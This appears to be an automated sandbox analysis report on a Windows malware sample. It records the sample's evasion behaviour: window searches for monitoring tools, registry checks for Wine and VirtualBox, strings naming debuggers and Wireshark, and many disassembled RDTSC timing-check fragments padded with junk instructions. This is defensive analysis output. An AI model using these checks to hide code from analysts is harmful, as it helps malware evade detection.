Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Window searched: window name: Regmonclass	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: PROCMON.EXE
Source: Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: X64DBG.EXE
Source: Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: WINDBG.EXE
Source: Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Hqle5OSmLQ.exe, 00000000.00000003.1414771440.0000000007B8F000.00000004.00001000.00020000.00000000.sdmp, Hqle5OSmLQ.exe, 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BD0B4 second address: 13BD0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007FA94CE91926h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BD0C1 second address: 13BD0CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BC2F7 second address: 13BC30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA94CE91933h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF13F second address: 13BF145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF145 second address: 13BF149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF149 second address: 13BF1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA94CE93538h 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+122D2947h] 0x00000015 mov edx, dword ptr [ebp+122D29B3h] 0x0000001b push 00000000h 0x0000001d jng 00007FA94CE9352Ah 0x00000023 mov dx, C3FFh 0x00000027 mov ecx, dword ptr [ebp+122D1CBCh] 0x0000002d call 00007FA94CE93529h 0x00000032 push ecx 0x00000033 jg 00007FA94CE9353Eh 0x00000039 pop ecx 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF1B8 second address: 13BF1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF1BD second address: 13BF20A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FA94CE93530h 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007FA94CE93537h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e je 00007FA94CE9352Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF20A second address: 13BF25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 mov esi, dword ptr [ebp+122D24B2h] 0x0000000c push 00000003h 0x0000000e xor edx, dword ptr [ebp+122D2DCBh] 0x00000014 mov dword ptr [ebp+122D2FC4h], edi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D1B62h], esi 0x00000022 push 00000003h 0x00000024 jnp 00007FA94CE91928h 0x0000002a mov cl, dh 0x0000002c or si, A28Ch 0x00000031 call 00007FA94CE91929h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FA94CE91938h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF25E second address: 13BF293 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007FA94CE93537h 0x0000000f push edi 0x00000010 jmp 00007FA94CE9352Fh 0x00000015 pop edi 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push ecx 0x0000001b push edi 0x0000001c pushad 0x0000001d popad 0x0000001e pop edi 0x0000001f pop ecx 0x00000020 mov eax, dword ptr [eax] 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jns 00007FA94CE93526h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF293 second address: 13BF2A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FA94CE91926h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF382 second address: 13BF388 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF388 second address: 13BF3C4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA94CE9192Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1A02h], ebx 0x00000013 push 00000000h 0x00000015 sub dword ptr [ebp+122D310Dh], esi 0x0000001b push 9A7C6CAEh 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA94CE91934h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF3C4 second address: 13BF3D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA94CE93531h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF3D9 second address: 13BF43C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 658393D2h 0x0000000f mov edx, ebx 0x00000011 push 00000003h 0x00000013 pushad 0x00000014 xor dword ptr [ebp+1245EACCh], ebx 0x0000001a jmp 00007FA94CE91935h 0x0000001f popad 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007FA94CE91928h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c mov dword ptr [ebp+122D1B01h], eax 0x00000042 push 00000003h 0x00000044 mov dh, 43h 0x00000046 push F3DC39B6h 0x0000004b pushad 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF43C second address: 13BF442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF442 second address: 13BF473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FA94CE91928h 0x0000000b popad 0x0000000c xor dword ptr [esp], 33DC39B6h 0x00000013 mov dword ptr [ebp+122D1A6Eh], ecx 0x00000019 lea ebx, dword ptr [ebp+1246203Ch] 0x0000001f mov edi, dword ptr [ebp+122D2FCCh] 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 jnp 00007FA94CE91926h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF473 second address: 13BF481 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA94CE9352Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF4D8 second address: 13BF4E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF4E4 second address: 13BF558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FA94CE93528h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D1AC6h], edx 0x00000027 push 00000000h 0x00000029 call 00007FA94CE93529h 0x0000002e jmp 00007FA94CE9352Fh 0x00000033 push eax 0x00000034 jmp 00007FA94CE93534h 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 je 00007FA94CE93526h 0x00000046 jbe 00007FA94CE93526h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF558 second address: 13BF591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jne 00007FA94CE91932h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF591 second address: 13BF66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA94CE93539h 0x0000000a popad 0x0000000b pop eax 0x0000000c movsx ecx, bx 0x0000000f mov ecx, 075757FAh 0x00000014 push 00000003h 0x00000016 or dword ptr [ebp+122D1B3Ch], esi 0x0000001c mov si, dx 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FA94CE93528h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b jmp 00007FA94CE93537h 0x00000040 push 00000003h 0x00000042 jnc 00007FA94CE9352Ch 0x00000048 call 00007FA94CE93529h 0x0000004d jmp 00007FA94CE93534h 0x00000052 push eax 0x00000053 jg 00007FA94CE93534h 0x00000059 mov eax, dword ptr [esp+04h] 0x0000005d jno 00007FA94CE93531h 0x00000063 mov eax, dword ptr [eax] 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FA94CE9352Dh 0x0000006e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13BF66A second address: 13BF683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91935h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DDC77 second address: 13DDC93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA94CE93537h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DDC93 second address: 13DDCBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 jmp 00007FA94CE91937h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FA94CE91926h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DDE17 second address: 13DDE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DDE1B second address: 13DDE34 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA94CE91926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FA94CE9192Ch 0x00000013 jo 00007FA94CE91926h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DDFB9 second address: 13DE03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007FA94CE93544h 0x0000000b jng 00007FA94CE93526h 0x00000011 jmp 00007FA94CE93538h 0x00000016 jne 00007FA94CE93551h 0x0000001c jo 00007FA94CE93543h 0x00000022 jmp 00007FA94CE93537h 0x00000027 jnc 00007FA94CE93526h 0x0000002d popad 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DE475 second address: 13DE48B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA94CE91930h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DE713 second address: 13DE719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DE719 second address: 13DE76C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA94CE91934h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FA94CE9192Ch 0x00000011 jnl 00007FA94CE9192Ah 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b jne 00007FA94CE91926h 0x00000021 pushad 0x00000022 popad 0x00000023 pop ecx 0x00000024 je 00007FA94CE9193Ah 0x0000002a jmp 00007FA94CE9192Eh 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DE76C second address: 13DE770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DE770 second address: 13DE77C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FA94CE91926h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DE77C second address: 13DE780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DE8E7 second address: 13DE8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DE8EB second address: 13DE90E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FA94CE93539h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DE90E second address: 13DE938 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91933h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c js 00007FA94CE91946h 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007FA94CE91926h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DE938 second address: 13DE944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DEAC9 second address: 13DEACF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DED9B second address: 13DEDCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA94CE93538h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DEDCC second address: 13DEDDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9192Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DEDDE second address: 13DEDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FA94CE9352Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DEDF1 second address: 13DEE17 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA94CE9193Bh 0x00000008 jc 00007FA94CE91926h 0x0000000e jmp 00007FA94CE9192Fh 0x00000013 pushad 0x00000014 jnc 00007FA94CE91926h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13D497A second address: 13D4981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13D4981 second address: 13D499A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA94CE91933h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13D499A second address: 13D49B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FA94CE93528h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jp 00007FA94CE93526h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13D49B5 second address: 13D49D2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA94CE91926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA94CE9192Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13D49D2 second address: 13D49D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13A97C7 second address: 13A981E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA94CE91934h 0x0000000d push esi 0x0000000e jmp 00007FA94CE91933h 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007FA94CE9192Eh 0x0000001f pushad 0x00000020 popad 0x00000021 jc 00007FA94CE91926h 0x00000027 jmp 00007FA94CE91933h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DF0C9 second address: 13DF0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DF0D3 second address: 13DF0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DF71E second address: 13DF722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DF722 second address: 13DF733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA94CE9192Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DF733 second address: 13DF738 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DF9DE second address: 13DF9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA94CE9192Fh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DF9F6 second address: 13DF9FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DFB51 second address: 13DFB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DFB55 second address: 13DFB85 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA94CE93528h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 jnp 00007FA94CE93526h 0x00000019 jmp 00007FA94CE9352Ch 0x0000001e popad 0x0000001f jo 00007FA94CE9352Ah 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DFB85 second address: 13DFB8F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA94CE91932h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DFB8F second address: 13DFB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13DFB95 second address: 13DFB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E1FFD second address: 13E2011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jng 00007FA94CE93526h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
